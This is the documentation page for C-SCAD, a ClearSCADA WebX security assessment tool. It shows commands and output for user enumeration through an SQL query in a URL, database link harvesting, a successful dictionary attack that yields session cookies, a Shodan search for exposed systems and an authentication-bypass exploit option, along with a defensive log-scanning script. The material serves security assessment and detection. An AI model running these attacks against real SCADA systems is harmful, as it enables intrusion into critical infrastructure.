Documentation - Examples : C-SCAD - Assessing Security Flaws in C-SCAD Web-X Client !


[*] C-SCAD Usage Parameters

	-----------------------------------------------------------
  
	 ______               ______    ______    ________    ______
	/_____/\             /_____/\  /_____/\  /_______/\  /_____/\     
	\:::__\/     _______ \::::_\/_ \:::__\/  \::: _  \ \ \:::_ \ \    
	 \:\ \  __  /______/\ \:\/___/\ \:\ \  __ \::(_)  \ \ \:\ \ \ \   
	  \:\ \/_/\ \__::::\/  \_::._\:\ \:\ \/_/\ \:: __  \ \ \:\ \ \ \  
	   \:\_\ \ \            /____ \:\ \:\_\ \ \ \:.\ \  \ \ \:\/.:| | 
	    \_____\/            \_____\/   \_____\/  \__\/\__\/  \____/_/ 
	     		                                                                                                
        C-SCAD : Schneider ClearSCADA: WebX (Client) Security Assessment Tool!
        Authored by: Aditya K Sood |contact [at] secniche.org  | 2014
        Twitter:     @AdityaKSood
        Powered by: SecNiche Security Labs ! (http://www.secniche.org)
        
        ClearSCADA : http://www.schneider-electric.com/products/
        ClearSCADA Spec : http://plcsystems.ru/catalog/SCADAPack/doc/ClearSCADA_spec_eng.pdf
        
	----------------------------------------------------------
Usage: cscad_v_1.0.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Access Configuration::
    -c CONFIG, --config_check=CONFIG
                        <CONFIGURATION = full> -- to check access permissions
                        on the directory structure of CleaSCADA !

  Enumeration::
    -e ENUMERATION, --enum=ENUMERATION
                        <ENUMERATION = users | database | database_links |
                        list_sql | list_reports | snmp_check |
                        accumulator_check > -- to enumerate the list of
                        available users, databases, reports and available sql
                        commands !

  Dictionary Crack::
    -a DICT_ATTACK, --dict_attack=DICT_ATTACK
                        <DICT ATTACK = dict_attack> -- to trigger dictionary
                        based cracking !

  Diagnostics::
    -d DIAG_ACCESS, --diag_access=DIAG_ACCESS
                        <DIAGNOSTICS = diag_access | dump_diag_data> -- to
                        verify the access to diagnostic webpage and dump data
                        !

  Shodan Search::
    -s SHODAN, --shodan_search=SHODAN
                        <SHODAN SEARCH = sh_search | shodan_search> -- to
                        search ClearSCADA exposed WebX interface using Shodan
                        search engine. URL option should be set to : -u =
                        shodanhq.com !

  Vulnerability Check::
    -b AUTH_BYPASS, --auth-bypass=AUTH_BYPASS
                        <EXPLOIT CODE = auth_bypass> -- exploit code for
                        ICSA-11-173-01 ClearSCADA Remote Authentication Bypass
                        Vulnerability !

[*] Generic Configuration Check

# python cscad_v_1.0.py -u 10.0.1.8 -c full

[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[+] (https://10.0.1.8/file/help_en-US/Content/WelcomePage.htm) - (200)
[+] Seems help files are present : https://10.0.1.8/file/help_en-US/Content/WelcomePage.htm
[*] Trying to extract installed ClearSCADA version !
[+] Installed version is: ['http://www.w3.org/1999/xhtml']

[+] --------------------------------------------------------
[+] checking directory (exposed) access permissions ..... !
[+] --------------------------------------------------------
[+] (https://10.0.1.8/db/) - (200)
[+] (https://10.0.1.8/alarms/) - (200)
[+] (https://10.0.1.8/list/) - (200)
[+] (https://10.0.1.8/logon/) - (200)
[+] (https://10.0.1.8/webservices) - (200)

[*] Web-X - Users Enumeration

[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[+] trying to access users list with query : /list/Users?SELECT%20%22FullName%22%20AS%20%22~FullName%22%2c%20%22Id%22%2c%20%22Foreground%22%2c%20%22Blink%22%2c%20%22Background%22%2c%20%22PasswordExpiryTime%22%2c%20%22UserGroupNames%22%2c%20%22TypeDesc%22%2c%20%22MemoryUsage%22%20FROM%20CDBUser%20ORDER%20BY%20%22~FullName%22%20ASC
<?xml version="1.0"?>

<Page>
<List>
<Columns>
<Column>FullName</Column>
<Column>Id</Column>
<Column>Foreground</Column>
<Column>Blink</Column>
<Column>Background</Column>
<Column>PasswordExpiryTime</Column>
<Column>UserGroupNames</Column>
<Column>TypeDesc</Column>
<Column>MemoryUsage</Column>
</Columns>
<Rows>
<Row>
<Value>Example Projects.~Config.Users.Reporter</Value>
<Value>5232</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>25/10/2014 21:44:08.816</Value>
<Value></Value>
<Value>User</Value>
<Value>3488</Value>
</Row>
<Row>
<Value>Users.Eng</Value>
<Value>6448</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>31/03/1601 17:00:00.000</Value>
<Value>Users.Groups.Engineer Group</Value>
<Value>User</Value>
<Value>6214</Value>
</Row>
<Row>
<Value>Users.Sales</Value>
<Value>6452</Value>
<Value>0</Value>
<Value>False</Value>
<Value>16777215</Value>
<Value>31/03/1601 17:00:00.000</Value>
<Value>Users.Groups.Sales Group</Value>
<Value>User</Value>
<Value>4702</Value>
</Row>
</Rows>
</List>
</Page>

[*] SQL Commands Check - Used for Querying Database

[+] ---------------------------------------------------------
[+] allowed SQL commands [/list/] through - ViewXCtrl in IE are 
[+] -----------------------------------------------------------
[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[Command] : Accumulators 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "CurrentTotalFormatted", "CurrentTotalTime", "CurrentTotalQualityDesc", "TypeDesc", "MemoryUsage" FROM CAccumulatorBase ORDER BY "~FullName" ASC"
---------------------------------------------------
[Command] : Advanced EWS Groups 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "StateDesc", "DataTimestamp", "QualityDesc", "CurrentRequest", "SourceName", "Source", "TypeDesc", "MemoryUsage", "AlarmViewLink" FROM CAdvancedEWSGroup ORDER BY "~FullName" ASC"
---------------------------------------------------
[Command] : Advanced EWS Servers 
[Query] : SELECT "FullName" AS "~FullName", "Id", "Foreground", "Blink", "Background", "StateDesc", "DataTimestamp", "QualityDesc", "Source", "TypeDesc", "MemoryUsage", "AlarmViewLink" FROM CAdvancedEWSServer ORDER BY "~FullName" ASC"
---------------------------------------------------

[*] Available Database Links for Extracting Information !

[+] ------------------------------------------------------------------
[+] extracted links from available databases on the target system are:  
[+] -------------------------------------------------------------------
[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)
[*] extracting database links from - https://10.0.1.8/db/?view
[L] https://10.0.1.8/db/Example%20Projects
[L] https://10.0.1.8/db/Example%20Projects.Electricity
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.12kV-120V%20Transformer
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Factory
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Factory.Logic
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Graphics
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.House
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.House.Logic
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Power%20Meter%20Display
[L] https://10.0.1.8/db/Example%20Projects.Electricity.Generation.Power%20Meter%20Display.Graphics

[*] Dictionary Attack

[*] https://10.0.1.8 is configured with SSL ! GOOD !
[+] engaging with target : (https://10.0.1.8)
[+] HTTP code returned : (200)
[+] configured ClearScada web server version: (ClearSCADA/6.74.5192.1)

[+] reading user names from users.txt file !
[+] reading password from pass.txt file !
[*] user and password list is constructed successfully!
[*] executing dictionary attack against : https://10.0.1.8/logon
[FAILED] (bill) | (scada_admin) 
[FAILED] (bill) | (bill) 
[FAILED] (bill) | (marvin) 
[FAILED] (bill) | (michele) 
[FAILED] (bill) | (rand) 
[FAILED] (bill) | (randy) 
[FAILED] (bill) | (remy) 
[FAILED] (bill) | (stacey) 
[FAILED] (bill) | (darr) 
[FAILED] (bill) | (engineer) 
[FAILED] (bill) | (sales) 
[FAILED] (bill) | (eng) 
[FAILED] (bill) | (admin) 
[FAILED] (bill) | (manager) 
[FAILED] (bill) | (guest) 
[FAILED] (bill) | (operator) 
[FAILED] (bill) | (Operator) 
[FAILED] (bill) | (Eng) 
[FAILED] (bill) | (Sales) 
[FAILED] (bill) | (welcome) 
[FAILED] (bill) | (Welcome) 
[FAILED] (bill) | (guest) 
[FAILED] (bill) | (Reporter) 
----------------------------------------------------------------------------------
[SUCCESS] (scada) | (scada_admin) (VIOLA, HUSTLE!)
[Cookie]  (CLEARSCADAUSERID={A8807501-A4F8-45AF-BA8D-94E4979186ED};Version=1;Path=/;Comment=Schneider Electric ClearSCADA User Identification, CLEARSCADASECUREUSERID={8CF68D03-1D99-451C-9979-4EA7C0C4E638};Secure;Version=1;Path=/;Comment=Schneider Electric ClearSCADA User Identification)
----------------------------------------------------------------------------------
[FAILED] (scada) | (bill) 
[FAILED] (scada) | (marvin) 
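
For the monitoring side of the user enumeration and dictionary attack runs shown above, the following added example (not part of C-SCAD or of the original page) scans web access logs for /list/ queries against the CDBUser table and for bursts of /logon requests from one source. The combined-style log format, the sample lines and the threshold are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumption: a reverse proxy in front of Web-X writes Apache combined-style
# access logs; ClearSCADA's own log format may differ. All lines are constructed.
SAMPLE_LOG = "\n".join(
    ['192.0.2.10 - - [25/Oct/2014:21:40:01 +0000] "GET /list/Users?SELECT%20%22FullName%22'
     '%2c%20%22Id%22%20FROM%20CDBUser%20ORDER%20BY%20%22~FullName%22%20ASC HTTP/1.1" 200 2211',
     '203.0.113.5 - - [25/Oct/2014:21:40:30 +0000] "GET /list/Accumulators?SELECT%20%22Id%22'
     '%20FROM%20CAccumulatorBase HTTP/1.1" 200 940']
    + ['192.0.2.10 - - [25/Oct/2014:21:41:%02d +0000] "POST /logon HTTP/1.1" 200 310' % s
       for s in range(12)]
    + ['198.51.100.7 - - [25/Oct/2014:21:45:%02d +0000] "POST /logon HTTP/1.1" 200 512' % s
       for s in (0, 9)])

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}')
FROM_TABLE = re.compile(r'\bfrom\s+"?(\w+)', re.I)
WATCHED_TABLES = {"cdbuser"}  # user-account table named in the query on this page


def analyse(log_text, logon_threshold=10):
    """Return (kind, source_ip, detail) findings for one access log."""
    findings, logons = [], Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        src, ts, target = m.groups()
        path, _, query = target.partition("?")
        path = path.lower()
        if path.startswith("/list/"):
            # The query travels URL-encoded in the request target; decode first.
            t = FROM_TABLE.search(unquote(query))
            if t and t.group(1).lower() in WATCHED_TABLES:
                findings.append(("user_table_query", src, t.group(1)))
        elif path.rstrip("/") == "/logon":
            logons[(src, ts[:17])] += 1  # bucket: source + dd/Mon/yyyy:HH:MM
    for (src, minute), n in sorted(logons.items()):
        if n >= logon_threshold:
            findings.append(("logon_burst", src, "%d requests in %s" % (n, minute)))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Legitimate Web-X clients also issue /list/ queries, so the check keys on the table name rather than on the presence of SQL; extend WATCHED_TABLES to match the site's own sensitive tables.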

[*] Shodan Search !

	----------------------------------------------------------

[*] ----------------------------------------------------------------
[*] total number of SHODAN results found for ClearSCADA: 268
[*] ----------------------------------------------------------------


Note: Please read the C-SCAD presentation for more details or try it :)